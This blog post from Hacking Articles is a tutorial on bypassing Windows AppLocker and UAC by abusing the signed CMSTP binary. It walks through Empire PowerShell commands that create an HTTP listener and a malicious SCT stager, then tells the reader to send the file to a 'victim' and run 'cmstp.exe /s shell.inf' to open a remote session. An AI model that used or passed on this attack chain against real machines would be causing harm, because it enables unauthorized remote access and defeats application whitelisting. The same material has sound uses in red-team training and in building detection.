By default, Applocker allows the executing of binaries in the folder that is the major reason that it can be bypassed. It has been found that such binaries can easily be used in order to bypass Applocker along with UAC. One of such binary related to Microsoft is CMSTP. CMSTP welcomes INF files and so exploitation through INF is possible. And so, we will be learning how to perform such exploitation.
As we all know CMSTP accepts SCT files and runs then without suspicion and therefore we will create a malicious SCT file to reach our goal. We will use Empire PowerShell for this. For a detailed guide on Empire PowerShell click here.
Launch the empire framework from the terminal of Kali and then type the following commands to create your malware :
listeners uselistener http set Host 192.168.1.109 execute
Above commands will create a listener for you, then type back to return from listener interface and as for the creation of SCT file type :
usestager windows/launcher_sct set Listener HTTP execute
Running the above exploit will create your SCT file. We will use the following script to execute our file in PowerShell. In this script give the path of your SCT file and add the following line as shown in the image.
Download this script from here:
Now, send the file to the victim’s PC and run the following command in victims’ command prompt :
cmstp.exe /s shell.inf
As soon as you run the command, you will have a session. Use the following command to access your session :
interact <session name>
This way, you can use CMSTP binary to bypass applocker restrictions. CMSTP needs an INF file and by using it to your advantage you can have access to victim’s PC.
Author: Yashika Dhir is a passionate Researcher and Technical Writer at Hacking Articles. She is a hacking enthusiast. contact here
The post Bypass Application Whitelisting using cmstp appeared first on Hacking Articles.